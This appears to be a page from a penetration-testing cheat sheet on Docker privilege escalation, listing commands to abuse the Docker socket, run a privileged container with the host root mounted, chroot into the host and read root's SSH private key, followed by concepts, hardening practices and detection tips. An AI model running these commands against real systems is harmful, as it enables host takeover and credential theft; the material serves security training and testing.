14. Docker

Docker Privilege Escalation Techniques

Check Docker Version

Determine the installed Docker version.

docker version

List Docker Images

View available Docker images.

docker image ls

List Docker Containers

Show all running and stopped Docker containers.

docker ps -a

Check User's Docker Group Membership

Check if the user is part of the docker group, which may allow privilege escalation.

id

Locate Docker Socket

Check the default location of the Docker socket.

ls -l /var/run/docker.sock

Download Docker Binary (If Not Available in Container)

Fetch the Docker binary in case it's missing.

wget <URL_TO_DOCKER_BINARY> -O docker
chmod +x docker

List Running Containers via Docker Socket

Use the Docker socket to list running containers.

./docker -H unix:///var/run/docker.sock ps

Run a Privileged Container with Host Root Mount

Start a privileged container and mount the host’s root filesystem.

./docker -H unix:///var/run/docker.sock run --rm -d --privileged -v /:/hostsystem <image_name>

Execute a Shell in the Privileged Container

Gain shell access inside the privileged container.

./docker -H unix:///var/run/docker.sock exec -it <container_id> /bin/bash

Access Host Files from Within the Container

View sensitive host files inside the container.

cat /hostsystem/root/.ssh/id_rsa

Run a Container with a Chroot into the Host

Use chroot to access the host system from inside a container.

docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash

Check If Docker Socket is Writable

Ensure that the Docker socket has the appropriate permissions.

ls -l /var/run/docker.sock

Using Docker Compose to List Running Containers

View running containers using Docker Compose.

docker-compose ps -a

Using Docker Compose to Execute a Shell in a Container

Access a shell within a running container using Docker Compose.

docker-compose exec <container_name> /bin/bash

Using Docker Compose to Check Service Configurations

Inspect service configurations in Docker Compose.

docker-compose config --services <service_name>

Key Concepts:

Docker Architecture:
- Docker Daemon (server): Manages containers, images, networks, and storage.
- Docker Client: Interface for interacting with the Daemon.
- Docker Compose: Orchestrates multi-container applications.
- Docker Desktop: GUI for managing Docker.
Docker Images and Containers:
- Images: Read-only templates.
- Containers: Mutable instances of images.
Privilege Escalation Vectors:
- Shared Directories (Volume Mounts): Accessing sensitive host files.
- Docker Sockets: Abusing the Docker daemon socket for control.
- Docker Group: Membership grants control over the Docker daemon.
- Writable Docker Sockets: Abusing writable docker sockets when the user is not in the docker group.

Exploitation Techniques:

Shared Directories:
- Locating mounted host directories within the container.
- Accessing sensitive files (e.g., SSH private keys).
Docker Sockets:
- Locating the docker.sock file.
- Using the docker binary (or downloading it) to interact with the socket.
- Running privileged containers with host root mounts.
- Using docker run with a chroot into the host system.
Docker Group:
- Checking user group membership (id).
- Exploiting the ability to run arbitrary Docker commands.
Writable Docker Sockets:
- Checking permissions on the docker.sock file.
- Executing commands through the docker socket to gain root on the host.

Important Considerations and Enhancements:

Security Best Practices:
- Minimize volume mounts.
- Use read-only mounts when possible.
- Restrict access to the Docker socket.
- Avoid running containers with --privileged.
- Implement proper user and group management.
- Use security scanning tools for docker images.
- Use docker rootless mode.
Attack Vectors:
- Exploiting vulnerabilities in the Docker daemon itself.
- Compromised Docker images.
- Misconfigured Docker Compose files.
Detection:
- Monitor Docker socket activity.
- Audit Docker configurations.
- Use intrusion detection systems.
Containerization Security:
- Understanding Docker security is crucial for modern infrastructure.
- Tools like Docker Bench for Security and Clair can help assess security.
Namespaces and Cgroups: Reinforce the importance of namespaces and cgroups in docker security.
Real World Examples: Researching real world docker escapes will help solidify understanding of the attack vectors.
Rootless Docker: Modern docker installations can run in rootless mode, which greately reduces the attack surface.
Docker Capabilities: Docker utilizes linux capabilities, and those can be missused.

Previous13. LXC Privilege Escalation Techniques Next15. Kubernetes

Last updated 16 days ago

hashtagDocker Privilege Escalation Techniques

hashtagCheck Docker Version

hashtagList Docker Images

hashtagList Docker Containers

hashtagCheck User's Docker Group Membership

hashtagLocate Docker Socket

hashtagDownload Docker Binary (If Not Available in Container)

hashtagList Running Containers via Docker Socket

hashtagRun a Privileged Container with Host Root Mount

hashtagExecute a Shell in the Privileged Container

hashtagAccess Host Files from Within the Container

hashtagRun a Container with a Chroot into the Host

hashtagCheck If Docker Socket is Writable

hashtagUsing Docker Compose to List Running Containers

hashtagUsing Docker Compose to Execute a Shell in a Container

hashtagUsing Docker Compose to Check Service Configurations

hashtagKey Concepts:

hashtagExploitation Techniques:

hashtagImportant Considerations and Enhancements: